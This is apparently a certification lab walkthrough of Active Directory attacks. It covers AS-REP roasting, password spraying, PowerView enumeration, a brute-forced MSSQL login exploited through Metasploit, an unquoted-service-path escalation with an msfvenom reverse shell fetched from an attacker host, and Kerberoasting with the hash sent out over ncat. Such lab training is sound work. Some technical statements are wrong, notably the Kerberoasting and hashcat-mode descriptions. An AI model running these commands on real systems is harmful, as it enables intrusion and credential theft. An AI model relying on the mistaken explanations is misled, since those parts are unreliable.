# 5. Active Directory (AD) Attacks ### Task 1: Perform Initial Scans to Obtain Domain Controller IP and Domain Name The initial scan in AD enumeration is crucial as it identifies the network structure, open ports, and services. This information helps ethical hackers map the AD environment, uncover vulnerabilities, and plan targeted attacks to assess security measures and identify potential weaknesses. ``` nmap 10.10.1.0/24 ```

**Port** **88/TCP** **kerberos-sec** and **port 389/TCP LDAP** opened which confirms that our DC IP address is **10.10.1.22**
#### Detailed scan ``` nmap -A -sC -sV 10.10.1.22 ```

We get the domain name and FQDN. ### Task 2: Perform AS-REP Roasting Attack An AS-REP roasting attack targets user accounts in AD that do not require Kerberos pre-authentication, exploiting the DONT\_REQ\_PREAUTH setting. Attackers can request a ticket-granting ticket (TGT) for these accounts without needing the user's password. The DC responds with an encrypted TGT, which the attacker captures. This TGT, encrypted with the user's password hash, is then subjected to offline password-cracking tools such as Hashcat or John the Ripper. By rapidly guessing the password, the attacker can eventually decrypt the TGT, revealing the user's password. ``` python3 GetNPUsers.py CEH.com/ -no-pass -usersfile /root/ADtools/users.txt -dc-ip 10.10.1.22. ``` * **GetNPUsers.py**: Python script to retrieve AD user information. * **CEH.com/**: Target AD domain. * **-no-pass**: Flag to find user accounts not requiring pre-authentication. * **-usersfile** \~/ADtools/users.txt: Path to the file with the user account list. * **-dc-ip 10.10.1.22**: IP address of the DC to query.

In Kali, we can use the following command as well ``` impacket-GetNPUsers -dc-ip 10.10.10.161 -request -no-pass -usersfile users.txt htb.local/ ``` ``` impacket-GetNPUsers -dc-ip 10.10.10.161 -request htb.local/ ``` We can observe that the user **Joshua** has **DONT\_REQUIRE\_PREAUTH** set. As this user is vulnerable to AS-REP roasting, we obtain Joshua's password hash. Copy that hash and save it as **joshuahash.txt**. Execute the command **echo '\[HASH]' > joshuahash.txt**.

Now crack the hash. ``` john --wordlist=/root/ADtools/rockyou.txt joshuahash.txt ```

### Task 3: Spray Cracked Password into Network using CrackMapExec. Using CrackMapExec for password spraying involves leveraging its capabilities to automate the process. For instance, if "cupcake" is a cracked password, CME can be used to test this password against numerous user accounts and services across a network. This approach helps identify other accounts that may be using the same password, facilitating further penetration testing or security assessments. You can spray the password as per the Nmap scan results on services which are running on our target. #### RDP Password spraying ``` cme rdp 10.10.1.0/24 -u /root/ADtools/users.txt -p “cupcake” ``` * **rdp**: Targets the Remote Desktop Protocol (RDP) service. * **10.10.1.0/24**: IP address range to target, encompassing all hosts within the subnet 10.10.1.0 with a subnet mask of 255.255.255.0. * **-u /root/ADtools/users.txt**: Specifies the path to the file containing user accounts for authentication. * **-p "cupcake"**: Password which we cracked using AS-REP Roasting to test against the RDP service on the specified hosts.

We find that user **Mark** is using the same password **cupcake** on host **10.10.1.40**. We can try to connect to RDP as user **mark**.

### Task 4: Perform Post-Enumeration using PowerView PowerView is a PowerShell tool designed for network and AD enumeration. It helps security professionals gather detailed information about user accounts, groups, computers, and domain trusts. PowerView is used to identify potential security weaknesses and misconfigurations in an AD environment. It is commonly employed in penetration testing and red team operations. It works from Windows. Launch **PowerShell** by searching for it in Windows search option. Now, execute the command **. .\PowerView\.ps1** to load the PowerView\.ps1 script in PowerShell. (You should have downloaded the script) ``` powershell -EP Bypass ``` First we need to bypass antivirus protection and then we can run the script. ``` Import-Module .\PowerView.ps1 ```

Execute **Get-NetComputer** command in PowerShell. This command will display all the information related to computers in AD. It lists all computer objects in AD, which can help in identifying network targets and mapping the AD environment. ``` Get-NetComputer ```

Execute **Get-NetGroup** in PowerShell. The Get-NetGroup command in PowerView lists all groups in AD, which helps in identifying group memberships and potential targets for privilege escalation. ``` Get-NetGroup ```

Execute command **Get-NetUser** in PowerShell. Get-NetUser in PowerView retrieves detailed information about AD user accounts, such as usernames and group memberships. It helps identify potential targets and understand the AD environment better. ``` Get-NetUser ```

We found a new user **SQL\_srv**, who has some high privileges and could be useful for further attacks.

Here are some other listed commands that you can use with **PowerView\.ps1** for enumeration: * **Get-NetOU** - Lists all organizational units (OUs) in the domain. * **Get-NetSession** - Lists active sessions on the domain. * **Get-NetLoggedon** - Lists users currently logged on to machines. * **Get-NetProcess** - Lists processes running on domain machines. * **Get-NetService** - Lists services on domain machines. * **Get-NetDomainTrust** - Lists domain trust relationships. * **Get-ObjectACL** - Retrieves ACLs for a specified object. * **Find-InterestingDomainAcl** - Finds interesting ACLs in the domain. * **Get-NetSPN** - Lists service principal names (SPNs) in the domain. * **Invoke-ShareFinder** - Finds shared folders in the domain. * **Invoke-UserHunter** - Finds where domain admins are logged in. * **Invoke-CheckLocalAdminAccess** - Checks if the current user has local admin access on specified machines. ### Task 5: Perform Attack on MSSQL service **xp\_cmdshell** is a SQL server stored procedure enabling command shell execution. Misconfigured xp\_cmdshell can lead to arbitrary command execution, data exfiltration, and potential network compromise, posing significant security risks. Proper configuration and security measures are crucial to mitigate these risks. The service runs on port 1433 and we will brute force the password first. Save the username **SQL\_srv** in a text file and name it as **user.txt** using command **pluma user.txt**. Now, bruteforce the password for MSSQL ``` hydra -L user.txt -P /root/ADtools/rockyou.txt 10.10.1.30 mssql ```

We have successfully cracked the password for **SQL\_srv**, which is "**batman**". Next, we will attempt to log into the service using **mssqlclient.py**. ``` python3 /root/impacket/examples/mssqlclient.py CEH.com/SQL_srv:batman@10.10.1.30 -port 1433 ``` Now, execute the following command. ``` SELECT name, CONVERT(INT, ISNULL(value, value_in_use)) AS IsConfigured FROM sys.configurations WHERE name='xp_cmdshell'; ```

A value of 1, indicating that xp_cmdshell is enabled on the server

Now, as we know that **xp\_cmdshell** is enabled on SQL server we can use Metasploit to exploit this service. ``` use exploit/windows/mssql/mssql_payload set RHOST 10.10.1.30 set USERNAME SQL_srv set PASSWORD batman set DATABASE master ```

Once the exploitation is complete, we will be getting a Meterpreter session. You can move to shell by typing **shell.** ### Task 6: Perform Privilege Escalation WinPEASx64.exe is a tool for Windows privilege escalation, identifying misconfigurations and vulnerabilities for potential exploitation. The Unquoted Service Path vulnerability in the RunOnce registry key arises when a Windows service path lacks proper quotation marks and contains spaces, enabling attackers to execute arbitrary code with elevated privileges during system startup. It is assumed that you still have the shell from last task. Move to **C:\Users\Public\Downloads** using **cd** and execute the command **powershell**.

Now, we need to host winPEASx64.exe on the attacker machine using Python. Open a new terminal, type **sudo su**, press **Enter**, and use **toor** as password. Execute the command **cd /root/ADtools**. Type **python3 -m http.server** and press **Enter** to host the **winPEASx64.exe** file.

Get back to the shell terminal and type ``` wget http://10.10.1.13:8000/winPEASx64.exe -o winpeas.exe ``` Once winpeas.exe is downloaded, execute it with **./winpeas.exe** ``` ./winpeas.exe ```

Once the execution is completed, observe the output. Here, we have a file named **file.exe** in **C:\Program Files\CEH Services** that is unquoted and can be exploited for privilege escalation.

Open a new terminal with root privileges using the command sudo su and **toor** as password and create a payload. ``` msfvenom -p windows/shell_reverse_tcp lhost=10.10.1.13 lport=8888 -f exe > /root/ADtools/file.exe ``` Go to another terminal and type **nc -nvlp 8888** and press **Enter** ``` nc -nvlp 8888 ```

Get back to our shell terminal and move to C:\Program Files\CEH Services. Execute the command ``` cd ../../.. ; cd "Program Files/CEH Services" ```

Execute the command. ``` move file.exe file.bak ; wget http://10.10.1.13:8000/file.exe -o file.exe ```

Switch to the Windows Server 2019 (AD) machine, assuming we are the victim now. Restart the machine by hovering over **Power and Display** button and click **Reset/Reboot** button present at the toolbar located above the virtual machine and log in with the username **SQL\_srv** and password "**batman**." We will get a shell on our Parrot OS. ### Task 7: Perform Kerberoasting Attack Rubeus is a tool for exploiting Kerberos weaknesses in Windows environments. Kerberoasting is a method to extract ticket granting ticket (TGT) hashes from AD. Attackers target service accounts with associated Kerberos service principal names (SPNs). TGTs are requested from the DC for these accounts, then cracked offline to reveal user passwords. Kerberoasting exploits weak service account passwords and the nature of Kerberos authentication. **We assume that we already have a shell on a windows system meaning access to AD environment.** In the netcat shell, execute the **powershell** command to launch PowerShell. Navigate to C:\Users\Public\Downloads and execute the command **cd ../.. ; cd Users\Public\Downloads** ``` cd ../.. ; cd Users\Public\Downloads ```

Now, we will be downloading Rubeus and netcat. Execute the command ``` wget http://10.10.1.13:8000/Rubeus.exe -o rubeus.exe ; wget http://10.10.1.13:8000/ncat.exe -o ncat.exe ```

Type **cd ../.. && cd Users\Public\Downloads** and press **Enter** to move into the Downloads folder Execute the command ``` rubeus.exe kerberoast /outfile:hash.txt ```

After kerberoasting the password hash for **DC-Admin** is saved in **hash.txt** file To get that hash file on the attacker machine, we will be using netcat. Open a new terminal, type **sudo su** and press **Enter**; use **toor** as password. Then execute the command ``` nc -lvp 9999 > hash.txt ```

In the shell terminal, execute the command. ``` ncat.exe -w 3 10.10.1.13 9999 < hash.txt ```

Get back to the netcat listener terminal and press **Enter** to save the file. Now, we will be using HashCat to crack the password hash ``` hashcat -m 13100 --force -a 0 hash.txt /root/ADtools/rockyou.txt ``` * -m 13100: This specifies the hash type. 13100 corresponds to Kerberos 5 AS-REQ Pre-Auth etype 23 (RC4-HMAC), a specific format for Kerberos hashes. * \--force: This option forces Hashcat to ignore warnings and run even if there are compatibility issues. Use this with caution, as it might cause instability or incorrect results. * -a 0: This specifies the attack mode. 0 stands for a straight attack, which is a simple dictionary attack where Hashcat tries each password in the dictionary as it is. * hash.txt: is the input file containing the hashes to crack * /root/ADtools/rockyou.txt: is the wordlist file used for the attack

After completation, we get the password **advanced!**. As DC-Admin has high privileges on the domain, we can use this password for further attacks. {% embed url="" %}